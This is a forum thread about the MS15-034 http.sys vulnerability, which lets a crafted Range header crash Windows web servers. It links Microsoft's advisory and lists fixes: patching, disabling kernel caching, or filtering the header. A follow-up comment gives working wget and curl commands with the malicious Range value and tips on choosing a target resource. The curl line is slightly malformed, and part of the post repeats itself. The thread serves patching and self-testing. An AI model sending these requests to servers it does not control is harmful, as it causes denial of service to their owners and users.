Microsoft Web server critical vulnerability - remote BSoD
NotHackingYou
Member Posts: 1,460 ■■■■■■■■□□
in Off-Topic
In a nutshell, there is a vulnerability in http.sys, the driver underlying IIS and any other service listening for HTTP on Windows (SSRS, IIS, etc). A manipulated Range header can cause the server to BSoD. Microsoft has released a patch.
If you are running a public facing web server on Server 2008R2 and up, you may be vulnerable to this.
Here is a screen grab where I BSoD'd this 2012R2 VM after a few tries of the command:
http://i.imgur.com/waJCVxi.jpg
Options to fix:
1. Patch
2. Disable kernel mode caching
3. Write and iRule to scrub out the Range header.
Reference material:
CVE-2015-1635 - RCE in Windows HTTP.sys : netsec
https://technet.microsoft.com/library/security/ms15-034
If you are running a public facing web server on Server 2008R2 and up, you may be vulnerable to this.
Here is a screen grab where I BSoD'd this 2012R2 VM after a few tries of the command:
http://i.imgur.com/waJCVxi.jpg
Options to fix:
1. Patch
2. Disable kernel mode caching
3. Write and iRule to scrub out the Range header.
Reference material:
CVE-2015-1635 - RCE in Windows HTTP.sys : netsec
https://technet.microsoft.com/library/security/ms15-034
When you go the extra mile, there's no traffic.
Comments
-
NotHackingYou
Member Posts: 1,460 ■■■■■■■■□□
To try this yourself you can use wget or curl:
[FONT=arial]wg[COLOR=#000000]et[/COLOR] --header="Range: bytes=18-18446744073709551615" http://<yourserver>/<rangeable_resource>[/FONT]
[FONT=arial]cu[COLOR=#000000]rl[/COLOR] -v http://<yourserver>/<rangeable_resource> -H "Host: <host header>" -"Range: bytes=18-13466744073709551615"[/FONT]
a rangeable resource is usually something like an image or audio file. Around 100k seems to work well. Too large and the resource will duck the cache, too small and it won't be cached.When you go the extra mile, there's no traffic.